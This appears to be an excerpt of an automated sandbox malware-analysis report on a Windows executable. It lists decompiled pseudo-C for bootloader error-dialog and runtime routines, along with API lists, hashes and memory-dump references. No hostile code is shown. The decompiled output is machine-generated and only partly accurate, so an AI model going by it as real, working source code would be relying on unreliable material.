                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm$f
                                                                                                                                                                                                                                                        • API String ID: 2395640692-629598281
                                                                                                                                                                                                                                                        • Opcode ID: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
                                                                                                                                                                                                                                                        • Instruction ID: 567eb695740ee0045b65900879aec65dc75bb798d4a252db8bca0f490ed0072e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF519D33B196068AE794EB19E424B292796FF44F88F108135DB4AC374DDF3AED418789
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB2240(void* __ebx, void* __rax, void* __rcx, void* __rdx, void* __r8) {
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                                                                                        				signed long long _t53;
                                                                                                                                                                                                                                                        				signed long long _t54;
                                                                                                                                                                                                                                                        				void* _t56;
                                                                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                                                                                        				signed long long _t79;
                                                                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t77 = _t78 - 0x20d0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABADB0(0x21d0, __rax, _t85, _t86);
                                                                                                                                                                                                                                                        				_t79 = _t78 - __rax;
                                                                                                                                                                                                                                                        				_t53 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t54 = _t53 ^ _t79;
                                                                                                                                                                                                                                                        				 *(_t77 + 0x20c0) = _t54;
                                                                                                                                                                                                                                                        				_t56 = __rcx;
                                                                                                                                                                                                                                                        				_t87 = __r8;
                                                                                                                                                                                                                                                        				_t75 = __rdx;
                                                                                                                                                                                                                                                        				GetModuleHandleW(??);
                                                                                                                                                                                                                                                        				r8d = 0x102;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t77 + 0x1fa0)) = 0x90cc0884;
                                                                                                                                                                                                                                                        				 *((long long*)(_t77 + 0x1fa4)) = _t77 + 0x1fb6;
                                                                                                                                                                                                                                                        				 *((short*)(_t77 + 0x1fb4)) = 0;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t77 + 0x1fac)) = 0xc80000;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t77 + 0x1fb0)) = 0x96;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2470(_t54, _t77 + 0x1fb6, __rdx, L"Unhandled exception in script", _t83);
                                                                                                                                                                                                                                                        				 *(_t79 + 0x38) = _t54;
                                                                                                                                                                                                                                                        				r8d = 0x2040;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				 *(_t79 + 0x30) = _t54;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC5F44(_t54, _t56, _t56, _t54, _t77);
                                                                                                                                                                                                                                                        				 *(_t79 + 0x40) = _t54;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC5F44(_t54, _t56, _t75, _t54, _t77);
                                                                                                                                                                                                                                                        				 *(_t79 + 0x48) = _t54;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC5F44(_t54, _t56, _t87, _t54, _t77);
                                                                                                                                                                                                                                                        				 *(_t79 + 0x50) = _t54;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				 *((long long*)(_t79 + 0x20)) = _t79 + 0x30;
                                                                                                                                                                                                                                                        				DialogBoxIndirectParamW(??, ??, ??, ??, ??);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0,  *(_t79 + 0x40), _t77 + 0x1fa0, L"Unhandled exception in script");
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0,  *(_t79 + 0x48), _t77 + 0x1fa0, L"Unhandled exception in script");
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0,  *(_t79 + 0x50), _t77 + 0x1fa0, L"Unhandled exception in script");
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t77 + 0x1f78)) == 0) goto 0xe5ab2375;
                                                                                                                                                                                                                                                        				DeleteObject(??);
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t77 + 0x1f80)) == 0) goto 0xe5ab2387;
                                                                                                                                                                                                                                                        				DestroyIcon(??);
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(__ebx, 0,  *(_t77 + 0x20c0) ^ _t79);
                                                                                                                                                                                                                                                        			}

















                                                                                                                                                                                                                                                        0x7ff6e5ab2247
                                                                                                                                                                                                                                                        0x7ff6e5ab2254
                                                                                                                                                                                                                                                        0x7ff6e5ab2259
                                                                                                                                                                                                                                                        0x7ff6e5ab225c
                                                                                                                                                                                                                                                        0x7ff6e5ab2263
                                                                                                                                                                                                                                                        0x7ff6e5ab2266
                                                                                                                                                                                                                                                        0x7ff6e5ab226d
                                                                                                                                                                                                                                                        0x7ff6e5ab2270
                                                                                                                                                                                                                                                        0x7ff6e5ab2275
                                                                                                                                                                                                                                                        0x7ff6e5ab2278
                                                                                                                                                                                                                                                        0x7ff6e5ab2287
                                                                                                                                                                                                                                                        0x7ff6e5ab2290
                                                                                                                                                                                                                                                        0x7ff6e5ab2297
                                                                                                                                                                                                                                                        0x7ff6e5ab22a1
                                                                                                                                                                                                                                                        0x7ff6e5ab22af
                                                                                                                                                                                                                                                        0x7ff6e5ab22b6
                                                                                                                                                                                                                                                        0x7ff6e5ab22c3
                                                                                                                                                                                                                                                        0x7ff6e5ab22d4
                                                                                                                                                                                                                                                        0x7ff6e5ab22e2
                                                                                                                                                                                                                                                        0x7ff6e5ab22e7
                                                                                                                                                                                                                                                        0x7ff6e5ab22ed
                                                                                                                                                                                                                                                        0x7ff6e5ab22f5
                                                                                                                                                                                                                                                        0x7ff6e5ab22fa
                                                                                                                                                                                                                                                        0x7ff6e5ab2302
                                                                                                                                                                                                                                                        0x7ff6e5ab2307
                                                                                                                                                                                                                                                        0x7ff6e5ab230f
                                                                                                                                                                                                                                                        0x7ff6e5ab2314
                                                                                                                                                                                                                                                        0x7ff6e5ab2319
                                                                                                                                                                                                                                                        0x7ff6e5ab232a
                                                                                                                                                                                                                                                        0x7ff6e5ab2334
                                                                                                                                                                                                                                                        0x7ff6e5ab233c
                                                                                                                                                                                                                                                        0x7ff6e5ab234a
                                                                                                                                                                                                                                                        0x7ff6e5ab2354
                                                                                                                                                                                                                                                        0x7ff6e5ab235e
                                                                                                                                                                                                                                                        0x7ff6e5ab236d
                                                                                                                                                                                                                                                        0x7ff6e5ab236f
                                                                                                                                                                                                                                                        0x7ff6e5ab237f
                                                                                                                                                                                                                                                        0x7ff6e5ab2381
                                                                                                                                                                                                                                                        0x7ff6e5ab23a5

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                        • Opcode ID: 6bea62eccc28d19483c18ff1a3e2d52c6af3fb64e3e46481c97fdf2a226d8d74
                                                                                                                                                                                                                                                        • Instruction ID: 94fa4d2b37a3cd2a2cee4e2d3edebb9abde62cc9fc594556ba732331ee331073
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6bea62eccc28d19483c18ff1a3e2d52c6af3fb64e3e46481c97fdf2a226d8d74
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13317233B08A8285EB24EF65E8652E96360FF88B84F440135EE4DCBA59DF3DD945C709
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 52%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB2620(void* __eflags, void* __rax, long long __rcx, signed long long __rdx, long long __r8, long long __r9, long long _a8, signed long long _a16, char _a24, long long _a32, char _a1048, char _a2072, char _a4120, signed int _a6168, intOrPtr _a6224, char _a6232) {
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                                                                        				signed long long _t46;
                                                                                                                                                                                                                                                        				signed long long _t47;
                                                                                                                                                                                                                                                        				long long _t48;
                                                                                                                                                                                                                                                        				long long _t64;
                                                                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a16 = __rdx;
                                                                                                                                                                                                                                                        				_a24 = __r8;
                                                                                                                                                                                                                                                        				_a32 = __r9;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABADB0(0x1840, __rax, _t76, _t77);
                                                                                                                                                                                                                                                        				_t67 = _t66 - __rax;
                                                                                                                                                                                                                                                        				_t46 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t47 = _t46 ^ _t66 - __rax;
                                                                                                                                                                                                                                                        				_a6168 = _t47;
                                                                                                                                                                                                                                                        				_t64 = __rcx;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB1040(GetLastError());
                                                                                                                                                                                                                                                        				_a16 =  &_a6232;
                                                                                                                                                                                                                                                        				r8d = 0x400;
                                                                                                                                                                                                                                                        				_a8 = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3BE4(_t40, _t41,  *_t47 | 0x00000002,  &_a1048, __r8, _a6224);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB74B0(_t24, _t47, __r8);
                                                                                                                                                                                                                                                        				_a16 = _t47;
                                                                                                                                                                                                                                                        				_a8 = _t64;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB1B30(_t47,  &_a24,  &_a1048, "%s%s: %s",  &_a1048);
                                                                                                                                                                                                                                                        				r8d = 0x800;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				r8d = 0x400;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t47, _t48,  &_a4120,  &_a24,  &_a6232, "%s%s: %s");
                                                                                                                                                                                                                                                        				if (_t47 == 0) goto 0xe5ab2734;
                                                                                                                                                                                                                                                        				r8d = 0x400;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t47, _t48,  &_a2072, "Fatal error detected",  &_a6232, "%s%s: %s");
                                                                                                                                                                                                                                                        				r9d = 0x30;
                                                                                                                                                                                                                                                        				MessageBoxW(??, ??, ??, ??);
                                                                                                                                                                                                                                                        				goto 0xe5ab274e;
                                                                                                                                                                                                                                                        				r9d = 0x30;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(MessageBoxA(??, ??, ??, ??), 0, _a6168 ^ _t67);
                                                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                                                        0x7ff6e5ab2620
                                                                                                                                                                                                                                                        0x7ff6e5ab2625
                                                                                                                                                                                                                                                        0x7ff6e5ab262a
                                                                                                                                                                                                                                                        0x7ff6e5ab2637
                                                                                                                                                                                                                                                        0x7ff6e5ab263c
                                                                                                                                                                                                                                                        0x7ff6e5ab263f
                                                                                                                                                                                                                                                        0x7ff6e5ab2646
                                                                                                                                                                                                                                                        0x7ff6e5ab2649
                                                                                                                                                                                                                                                        0x7ff6e5ab2651
                                                                                                                                                                                                                                                        0x7ff6e5ab2664
                                                                                                                                                                                                                                                        0x7ff6e5ab2679
                                                                                                                                                                                                                                                        0x7ff6e5ab267e
                                                                                                                                                                                                                                                        0x7ff6e5ab2684
                                                                                                                                                                                                                                                        0x7ff6e5ab2694
                                                                                                                                                                                                                                                        0x7ff6e5ab269b
                                                                                                                                                                                                                                                        0x7ff6e5ab26a0
                                                                                                                                                                                                                                                        0x7ff6e5ab26b4
                                                                                                                                                                                                                                                        0x7ff6e5ab26c3
                                                                                                                                                                                                                                                        0x7ff6e5ab26d2
                                                                                                                                                                                                                                                        0x7ff6e5ab26d8
                                                                                                                                                                                                                                                        0x7ff6e5ab26dd
                                                                                                                                                                                                                                                        0x7ff6e5ab26f0
                                                                                                                                                                                                                                                        0x7ff6e5ab26f8
                                                                                                                                                                                                                                                        0x7ff6e5ab26fa
                                                                                                                                                                                                                                                        0x7ff6e5ab270f
                                                                                                                                                                                                                                                        0x7ff6e5ab2714
                                                                                                                                                                                                                                                        0x7ff6e5ab272c
                                                                                                                                                                                                                                                        0x7ff6e5ab2732
                                                                                                                                                                                                                                                        0x7ff6e5ab2734
                                                                                                                                                                                                                                                        0x7ff6e5ab2768

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E5AB7744,?,?,?,?,?,?,?,?,?,?,?,00007FF6E5AB101D), ref: 00007FF6E5AB2654
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB74B0: GetLastError.KERNEL32(00000000,00007FF6E5AB26A0), ref: 00007FF6E5AB74D7
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB74B0: FormatMessageW.KERNEL32(00000000,00007FF6E5AB26A0), ref: 00007FF6E5AB7506
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB7A30: MultiByteToWideChar.KERNEL32 ref: 00007FF6E5AB7A6A
                                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF6E5AB272C
                                                                                                                                                                                                                                                        • MessageBoxA.USER32 ref: 00007FF6E5AB2748
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                        • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                        • API String ID: 2806210788-2410924014
                                                                                                                                                                                                                                                        • Opcode ID: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
                                                                                                                                                                                                                                                        • Instruction ID: 81d19d8a492b8beb8e1ca36a51ed7fa7d1d66c5af906e95ba464c3cd29355641
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6731A57372868541E760AB14E4607EA6364FF84B88F404036EA8DC369DCF3DDB05CB85
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        • Opcode ID: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
                                                                                                                                                                                                                                                        • Instruction ID: f1e42d304366098127b42d70453a7f9ffe5610684cae1a75b31bbe8da972afe0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ADF0A472B1960241EB105B18A4653391320BF85FA5F440235C96DCA6F4CF2ED844C70A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AD87A4(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                                                                        				signed int _t30;
                                                                                                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                                                                                                        				signed int _t42;
                                                                                                                                                                                                                                                        				signed int _t43;
                                                                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_a16 = __rsi;
                                                                                                                                                                                                                                                        				_t27 = __ecx & 0x0000001f;
                                                                                                                                                                                                                                                        				if ((__ecx & 0x00000008) == 0) goto 0xe5ad87d6;
                                                                                                                                                                                                                                                        				if (sil >= 0) goto 0xe5ad87d6;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD8F3C(_t27, _t51);
                                                                                                                                                                                                                                                        				_t28 = _t27 & 0xfffffff7;
                                                                                                                                                                                                                                                        				goto 0xe5ad882d;
                                                                                                                                                                                                                                                        				_t42 = 0x00000004 & dil;
                                                                                                                                                                                                                                                        				if (_t42 == 0) goto 0xe5ad87f1;
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				if (_t42 >= 0) goto 0xe5ad87f1;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD8F3C(_t28, _t51);
                                                                                                                                                                                                                                                        				_t29 = _t28 & 0xfffffffb;
                                                                                                                                                                                                                                                        				goto 0xe5ad882d;
                                                                                                                                                                                                                                                        				_t43 = dil & 0x00000001;
                                                                                                                                                                                                                                                        				if (_t43 == 0) goto 0xe5ad880d;
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				if (_t43 >= 0) goto 0xe5ad880d;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD8F3C(_t29, _t51);
                                                                                                                                                                                                                                                        				_t30 = _t29 & 0xfffffffe;
                                                                                                                                                                                                                                                        				goto 0xe5ad882d;
                                                                                                                                                                                                                                                        				_t44 = dil & 0x00000002;
                                                                                                                                                                                                                                                        				if (_t44 == 0) goto 0xe5ad882d;
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				if (_t44 >= 0) goto 0xe5ad882d;
                                                                                                                                                                                                                                                        				if ((dil & 0x00000010) == 0) goto 0xe5ad882a;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD8F3C(_t30, _t51);
                                                                                                                                                                                                                                                        				_t31 = _t30 & 0xfffffffd;
                                                                                                                                                                                                                                                        				_t46 = dil & 0x00000010;
                                                                                                                                                                                                                                                        				if (_t46 == 0) goto 0xe5ad8847;
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				if (_t46 >= 0) goto 0xe5ad8847;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD8F3C(_t31, _t51);
                                                                                                                                                                                                                                                        				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                                                                                                                                                                                                        			}













                                                                                                                                                                                                                                                        0x7ff6e5ad87a4
                                                                                                                                                                                                                                                        0x7ff6e5ad87a9
                                                                                                                                                                                                                                                        0x7ff6e5ad87b8
                                                                                                                                                                                                                                                        0x7ff6e5ad87c0
                                                                                                                                                                                                                                                        0x7ff6e5ad87c5
                                                                                                                                                                                                                                                        0x7ff6e5ad87cc
                                                                                                                                                                                                                                                        0x7ff6e5ad87d1
                                                                                                                                                                                                                                                        0x7ff6e5ad87d4
                                                                                                                                                                                                                                                        0x7ff6e5ad87db
                                                                                                                                                                                                                                                        0x7ff6e5ad87de
                                                                                                                                                                                                                                                        0x7ff6e5ad87e0
                                                                                                                                                                                                                                                        0x7ff6e5ad87e5
                                                                                                                                                                                                                                                        0x7ff6e5ad87e7
                                                                                                                                                                                                                                                        0x7ff6e5ad87ec
                                                                                                                                                                                                                                                        0x7ff6e5ad87ef
                                                                                                                                                                                                                                                        0x7ff6e5ad87f1
                                                                                                                                                                                                                                                        0x7ff6e5ad87f5
                                                                                                                                                                                                                                                        0x7ff6e5ad87f7
                                                                                                                                                                                                                                                        0x7ff6e5ad87fc
                                                                                                                                                                                                                                                        0x7ff6e5ad8803
                                                                                                                                                                                                                                                        0x7ff6e5ad8808
                                                                                                                                                                                                                                                        0x7ff6e5ad880b
                                                                                                                                                                                                                                                        0x7ff6e5ad880d
                                                                                                                                                                                                                                                        0x7ff6e5ad8811
                                                                                                                                                                                                                                                        0x7ff6e5ad8813
                                                                                                                                                                                                                                                        0x7ff6e5ad8818
                                                                                                                                                                                                                                                        0x7ff6e5ad881e
                                                                                                                                                                                                                                                        0x7ff6e5ad8825
                                                                                                                                                                                                                                                        0x7ff6e5ad882a
                                                                                                                                                                                                                                                        0x7ff6e5ad882d
                                                                                                                                                                                                                                                        0x7ff6e5ad8831
                                                                                                                                                                                                                                                        0x7ff6e5ad8833
                                                                                                                                                                                                                                                        0x7ff6e5ad8838
                                                                                                                                                                                                                                                        0x7ff6e5ad883f
                                                                                                                                                                                                                                                        0x7ff6e5ad885d

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                                        • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                                                                        • Instruction ID: 9a5cc753a01cd8438d33b8d6a665ccd1d8d562b66e2add42e1e2496bcf43c980
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99118263F18A0711F698322CE46537918427FE8BACF140634ED6ED66D6CE2EAC414B4A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF6E5AC9A73,?,?,00000000,00007FF6E5AC9D0E,?,?,?,?,?,00007FF6E5AC21EC), ref: 00007FF6E5ACA87F
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6E5AC9A73,?,?,00000000,00007FF6E5AC9D0E,?,?,?,?,?,00007FF6E5AC21EC), ref: 00007FF6E5ACA89E
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6E5AC9A73,?,?,00000000,00007FF6E5AC9D0E,?,?,?,?,?,00007FF6E5AC21EC), ref: 00007FF6E5ACA8C6
